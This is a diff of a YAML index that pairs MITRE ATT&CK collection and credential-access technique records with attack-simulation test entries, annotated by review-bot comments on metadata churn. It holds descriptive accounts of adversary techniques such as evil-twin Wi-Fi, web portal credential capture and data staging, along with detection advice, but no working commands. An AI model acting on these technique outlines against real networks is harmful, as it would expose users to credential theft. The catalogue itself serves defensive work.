Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests:
- name: Stage data from Discovery.bat
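Review bot: the `Prevailion DarkWatchman 2021` URL is replaced with a Wayback Machine snapshot (`web.archive.org/web/20220629230035/...`) while the description still says `Retrieved January 10, 2022`, which predates the June 2022 snapshot. That is how upstream records it, so leave the data as-is, but retrieval dates in these references should not be treated as provenance for the archived copy. The rest of the hunk is a key reorder plus the `modified` and spec-version refresh, with no change to the technique text.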
@@ -81983,7 +82466,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -82007,8 +82490,6 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests:
- name: Email Collection with PowerShell Get-Inbox
@@ -82053,7 +82534,7 @@ collection:
name: powershell
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -82074,6 +82555,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -82097,8 +82579,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -82123,7 +82607,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests:
- name: Automated Collection Command Prompt
@@ -82258,7 +82741,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests:
- name: Utilize Clipboard to store or execute commands from
@@ -82357,7 +82839,7 @@ collection:
name: sh
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -82391,10 +82873,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
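Review bot: key ordering churns: `x_mitre_attack_spec_version: 3.2.0` is inserted here between `kill_chain_phases` and `x_mitre_contributors` for T1530, while the reshuffled T1074.002 and T1074 blocks in the same patch place it after `object_marking_refs`. If this file is regenerated from STIX, consider a fixed key order in the generator so future diffs show content changes rather than moves; the only substantive change in this hunk is the added contributor `Arun Seelagan, CISA`.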
@@ -82405,13 +82889,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -82452,9 +82937,6 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests:
- name: Azure - Enumerate Azure Blobs with MicroBurst
@@ -82584,30 +83066,7 @@ collection:
elevation_required: false
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -82618,23 +83077,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
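Review bot: the T1005 `modified` timestamp moves backwards, from `2023-05-09T14:00:00.188Z` to `2023-04-12T23:54:39.466Z`. The old value's `14:00:00.188Z` suffix recurs on several entries in this patch and looks like a placeholder, so the new value is probably the authoritative upstream STIX `modified`; please confirm that rather than a regression. For T1074.002 in the same hunk, the Mandiant M-Trends 2020 URL changes from content.fireeye.com to the mandiant.com PDF while the `Retrieved April 24, 2020` text is unchanged, which matches how upstream records it; `x_mitre_version` staying at `1.1` is consistent with a metadata-only refresh.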
@@ -82704,7 +83187,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests:
- name: Search files of interest and save them to a single zip file (Windows)
@@ -82814,7 +83296,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -82833,8 +83315,6 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests:
- name: Compressing data using GZip in Python (FreeBSD/Linux)
@@ -82981,6 +83461,87 @@ collection:
cleanup_command: 'rm #{path_to_output_file}
'
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
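Review bot: the new T1557.004 entry sets `x_mitre_detection: ''` (empty string) rather than omitting the key; check that consumers treat an empty string and a missing key the same way, since other entries in this file always carry text there. The description keeps the upstream wording verbatim, including `the adversary may able to monitor`, which should stay as-is if this mirrors ATT&CK. Note that the citation key `(Citation: Australia ‘Evil Twin’)` uses typographic quotes and must match the `source_name: Australia ‘Evil Twin’` reference byte-for-byte; it does here, but it is fragile for any later hand edits. `atomic_tests: []` is expected for a newly added technique.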
@@ -83009,7 +83570,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
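Review bot: the `modified` value for T1602.002 again moves backwards (`2022-05-11T14:00:00.188Z` to `2022-02-17T19:50:46.948Z`), same pattern as T1005. Unrelated to this change but visible in the context: the reference description reads `TA18-068A` while the URL is `.../alerts/TA18-086A`; that mismatch is upstream ATT&CK data and should not be patched here, but it may be worth reporting.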
@@ -83039,8 +83600,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
@@ -83094,7 +83653,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests:
- name: Compress Data for Exfiltration With PowerShell
@@ -83155,7 +83713,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -83183,12 +83741,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
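Review bot: T1185 (Browser Session Hijacking) loses `x_mitre_attack_spec_version: 2.1.0` with no replacement in this hunk, whereas T1557.003 in the neighbouring hunks is bumped from `2.1.0` to `3.2.0`. Please verify a current spec version remains somewhere in the T1185 block; if not, this entry ends up without one.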
@@ -83225,23 +83781,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
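Review bot: this hunk is a pure reorder of `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_domains` and `x_mitre_is_subtechnique` for T1557.003 with no value changes; it is fine as generated output, but it is the kind of noise a stable key order in the generator would avoid. `x_mitre_version` staying at `1.1` alongside the `modified` bump is consistent with a citation-only update.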
@@ -83274,21 +83830,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
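Review bot: replacing the dead lockstepgroup.com link with the web.archive.org snapshot and updating the retrieval date to `September 12, 2024` is the right call. `x_mitre_attack_spec_version` for T1557.003 goes `2.1.0` to `3.2.0`, and T1557.001's `modified` moves backwards (`2023-04-25` to `2022-10-25`), same placeholder pattern as noted for T1005; confirm these are the upstream per-object values rather than a global bump.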
@@ -83396,7 +83951,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests:
- name: LLMNR Poisoning with Inveigh (PowerShell)
@@ -83415,7 +83969,7 @@ collection:
elevation_required: true
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -83426,13 +83980,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -83446,6 +84000,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -83456,12 +84011,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -83506,7 +84061,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests:
- name: Registry artefact when application use webcam
@@ -83525,25 +84079,7 @@ collection:
name: command_prompt
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -83553,31 +84089,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
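Review bot: `x_mitre_permissions_required: [User]` is removed from T1213.001 here (and from T1056 later in this patch), but T1114.001 and T1602.002 keep their `x_mitre_permissions_required` lists in this same patch. If the field is being retired, it should go everywhere; if it is being kept where upstream still has it, a short note in the commit message would help. The bullet change to `Testing / development credentials (i.e., [Unsecured Credentials](...))` together with `x_mitre_version: '1.1'` is a proper content bump.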
@@ -83610,10 +84163,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -83622,16 +84177,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
